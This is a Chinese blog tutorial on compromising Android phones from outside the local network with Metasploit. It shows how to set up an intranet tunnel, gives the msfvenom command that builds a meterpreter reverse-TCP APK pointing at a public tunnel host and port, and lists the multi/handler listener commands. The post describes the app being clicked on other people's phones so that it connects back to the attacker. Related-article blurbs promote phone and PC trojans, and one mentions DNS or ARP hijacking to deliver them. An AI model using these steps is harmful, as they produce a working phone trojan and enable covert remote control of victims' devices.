msf手机渗透二(实现外网渗透)

已于 2022-11-14 15:30:23 修改
阅读量3.1k 收藏 52
点赞数 4
分类专栏: msf渗透 文章标签: linux 学习
于 2022-11-07 21:52:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63204687/article/details/127732799
版权

目录

一、思路概述

二、实现步骤

1.测试主机连通性

2.注册账号并开通隧道

2.下载客户端

​编辑 3.配置客户端

4.生成App

5、启动msfconsole

1.加载模块

2.设置payload监听

3.设置options

6.使用

一、思路概述

  在内网穿透官网注册飞鸽内网穿透开通隧道,然后本地端口与公网端口绑定,这样访问公网的所有请求最后都会传入本地端口。在本地生成apk的时候使用公网IP和对应Port而对其进行监听的时候设置本地IP和port。这样app在别人手机上被点击以后会直接链接公网对应IP端口,因为公网的已经和本地的绑定了,并且在电脑监听的时候监听的是本地端口,所以最后链接返回给本地电脑。

  使用公网开通隧道本质上是一个桥梁作用,连接了不同局域网之间的通信。

二、实现步骤

1.测试主机连通性

2.注册账号并开通隧道

2.下载客户端

3.配置客户端

#解压
tar -zxvf linux_amd64_client.tar.gz
#进入到目录
cd linux_amd64_client
#赋予权限
sudo chmod +x npc 
#启动命令
./npc -server=xxxxx -vkey=xxxx

至此主机与公网端口之间映射完毕。

4.生成App

注:这里只是我映射了两个端口,只有知道他们三者之间是一一对应的从而完成App生成就行。

msfvenom -p android/meterpreter/reverse_tcp lhost=free.svipss.top lport=15575 R>zzh.apk
#msfvenom -p android/meterpreter/reverse_tcp lhost=公网地址或者网址 lport=公网端口 R>zzh.apk

5、启动msfconsole

1.加载模块

use exploit/multi/handler

2.设置payload监听

set payload android/meterpreter/reverse_tcp

3.设置options

set lhost 127.0.0.1
set lport 7890

注:App生成详情msf渗透(内网)

6.使用

7.关于 apache2的相关补充

# 启动apache2
service apache2 satrt
# 对apache2的配置文件进行更改
vim /etc/apache2/ports.conf

 

 

 

 

『Knight』
关注
  • 4
    点赞
  • 52
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
渗透测试实战 - 外网渗透内网穿透(超详细)
HAKUNAMATATATTA的博客
02-18 7414
渗透测试实验,外网渗透内网穿透的详细操作过程以及内网代理和内网探测的方法
MSF实现远程渗透
WFC1006848997的博客
01-12 2513
MSF实现远程渗透 在本地测试腻了的小伙伴安耐不住,想耍耍远程的朋友,奈何不会msf远程渗透,服务器搭建也不会,那怎么办呢?今天笔者将分享一个让你本地的kali也能耍耍你远方的朋友,上才艺。 0x01环境准备 系统:Kali linux 工具:MSF、 Sunny-Ngrok 0x02环境部署 打开Sunny官网 (www.ngrok.cc),点击注册 完成注册登录,点击隧道管理,点击开通隧道,选择0元白嫖,当然你可以选择其他,笔者只能白嫖 可阅读,确认 隧道协议选择tcp,然后为你的隧道取个名称,选
MSF入侵安卓手机【附源码笔记】
最新发布
2301_77162959的博客
05-13 635
MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件。msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径。
超实用!手把手教你如何用MSF进行后渗透测试!
xv66666的博客
07-20 1111
Meterpreter的shell运行在内存中,目标重启就会失效,如果管理员给系统打上补丁,那么就没办法再次使用exploit获取权限,所以需要持久的后门对目标进行控制。Meterpreter 是msf的一个payload,目标执行之后,我们会得到一个会话,和常见的shell会话类似,但是它的功能更加强大,它是执行后渗透测试的实施通道。msf提供了一个功能模块可以让我们假冒别人的令牌,实现身份切换,如果目标环境是域环境,刚好域管理员登录过我们已经有权限的终端,那么就可以假冒成域管理员的角色。
MSF外网渗透+shellcode免杀
weixin_45605352的博客
04-19 4593
1. 内网穿透 使用的Sunny-Ngrok服务 。你在Sunny-Ngrok官网注册好后获得一条免费或付费的隧道,添加tcp通道,端口号自定。 官网链接:https://www.ngrok.cc/(Sunny-Ngrok服务 ) 在kali下安装Sunny-Ngrok的客户端,在该目录下启动Sunny-Ngrok。 2. 外网渗透 生成外网木马。注意这里的lhost和lport为赠送的域名和远程端口号: msfvenom -p windows/meterpreter/reverse_tcp lho
超牛叉的外网渗透详细教程
cheyunhua的博客
03-22 6176
文章来源 简书 https://mp.weixin.qq.com/s/oGUDJxPOfCz2CW-mCeeAlQ(原文) 众所周知,Metasploit 是个内网渗透神器。 但是内网渗透哪有外网刺激,于是笔者上度娘搜索“msf 外网”。 搜索结果的话, 首先,虚拟机里的kali不能渗透外网的原因是它没有外网IP。 所以大多数都是用内网穿透工具,还有一部分是通过服务器做个frp代理。 本质其实都一样。但是亲测后者比较有用。 可!是! 第个方法有一个特点,就是很烦。 买好服务器之后再下载frp,服务器
【网络安全知识体系】外网渗透测试 | 14个小实验
04-18 1万+
【通俗易懂】外网渗透测试的流程&14个小实验带你了解网络安全
浅谈MSF渗透测试
02-24
渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
MSF安卓手机渗透.md
12-07
MSF安卓手机渗透.md
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
"MSFconsole(msf渗透神器)windows平台可以使用,亲测可用" 指出该资源是Metasploit Framework(简称MSF)的一个版本,特别适用于Windows操作系统,并且已经被验证为可正常运行。MSFconsole是Metasploit Framework的...
初学MSF渗透、提权、免杀(上)
qq_53058639的博客
08-01 1812
Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF的漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程的渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
Kali使用Metasploit内、外网渗透windows系统
热门推荐
QQ670663的博客
02-17 2万+
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。 一、(内网渗透)内网英文缩写WAN;内网又称局域网 局域网的覆盖范围一般是方圆几千米之内,其具备的安装便捷、成本节约、扩展方便等特点使其在各类办公室内运用广泛。局域网可以实现文件管理、应用软件共享、打印机共享等功能,在使用过程当中,通过维护局域网网...
metasploit、msfvenom生成木马入侵电脑及手机
爱我非你莫属的博客
10-08 3008
简介 msfvenom msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件 查看所有–payload的模块 msfvenom -l payloads 文件后缀名-f的格式 msfvenom --help-formats metasploit Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个
kali渗透内网和外网
weixin_62693307的博客
04-17 6096
set payload windows/meterpreter/reverse_tcp 设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)接着我们要在Sunny-Ngrok注册登陆,这里要买个隧道,但是免费的,就是认证要花2元,这个隧道是帮助我们做内网穿透的,但这个免费的隧道服务器在美国那边,所以有的时候可能不太好用。这里设置的IP和侦听的端口后生成外网木马程序时的IP和端口时不一样的,因为我们这是内网入侵外网
MSF渗透测试android手机
永远是少年
06-15 4935
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF渗透测试android手机。 一、Android木马生成 、Android木马安装 三、效果检验
渗透系列:外网渗透内网穿透(超详细)
weixin_54626591的博客
12-07 902
外网渗透内网穿透(超详细)
msf渗透linux
09-07
在使用 MSF 进行 Linux 渗透测试时,可以使用不同的模块和命令来实现不同的目标。比如,可以使用 "exploit/multi/mysql/mysql_udf_payload" 模块来执行针对 MySQL 数据库的攻击,并利用已知的漏洞进行远程执行代码的...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

『Knight』

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值